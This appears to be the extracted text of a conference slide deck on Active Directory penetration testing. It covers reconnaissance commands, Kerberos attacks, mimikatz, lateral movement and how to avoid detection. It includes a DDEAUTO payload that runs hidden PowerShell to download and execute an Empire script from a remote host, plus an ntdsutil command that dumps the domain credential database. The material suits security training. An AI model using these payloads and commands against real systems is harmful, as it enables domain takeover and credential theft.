ACTIVE DIRECTORY
Carlos García García
ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book “Hacking Windows: Ataques a sistemas y redes Microsoft”
WE GOING TO TALK ABOUT?
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
• Domain admins
• Enterprise admins
• Built-in administrators
• Account Operators
• Allowed RODC Password Replication Group
• Backup Operators
• DnsAdmins
• …
WMIC
Reference:
Microsoft Advanced Threat Analytics
DDEAUTO
"C:\\Programs\\Microsoft\\Office365\\Outlook\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"
Command                                  Description
ping ☺
echo %USERDOMAIN%                        Domain name which the host is joined to
echo %logonserver% / set logonserver     Obtains the name of the Domain Controller the host used to authenticate to
Command                                  Description
net user /domain                         Lists all users within the current domain
net user <ACCOUNT NAME> /domain          Obtains detailed information about a user given their username
net view                                 Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain
net use                                  Access to shared resources
net accounts /domain                     Obtains the domain password policy
nltest /domain_trusts                    Maps trust relationships
Reference:
https://adsecurity.org/?p=2362
4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN)
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
PowerView Find-DomainShare
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. Lists drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc.
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
References:
https://github.com/gentilkiwi/mimikatz
• BloodHound
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
Kerberos
References:
http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
Attacker
krbtgt:hash
TGT:
• Username
• Group membership
• …
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
Schtasks
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST
SC
sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
WinRM
PsExec
Ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Invoke-NinjaCopy
User SID
Group SIDs
Logon SID
Others …
• Run as
• NTLM Relay
• Pass-the-hash
Logon session
• Pass-the-ticket
• Golden ticket
carlos@ciyi.es
ciyinet
ciyinet@protonmail.com